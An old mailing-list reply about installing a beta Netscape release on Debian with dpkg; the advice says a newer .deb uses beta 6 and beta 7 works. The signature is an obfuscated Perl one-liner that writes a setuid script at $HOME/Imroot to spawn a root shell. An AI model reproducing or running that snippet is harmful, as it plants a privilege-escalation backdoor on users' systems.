Re: Installing Netscape with dpkg

> Anyway, I looked on the Netscape ftp archive last night and they now
> have 3.0b5, 3.0b6, and 3.0b7 _only_ on their site, not b4.
>
> Dpkg specifically asks for the beta 4 binary; can I get away with using
> one of the newer binaries?  Do I need to tweak anything to get it to
> install using dpkg?

There's a version of the netscape .deb (in unstable?) that uses beta6.

(Actually, I installed beta 7 with it, despite all the warnings about not
doing that, and it's working with no problems.)

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod          <jeh22@cornell.edu>
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_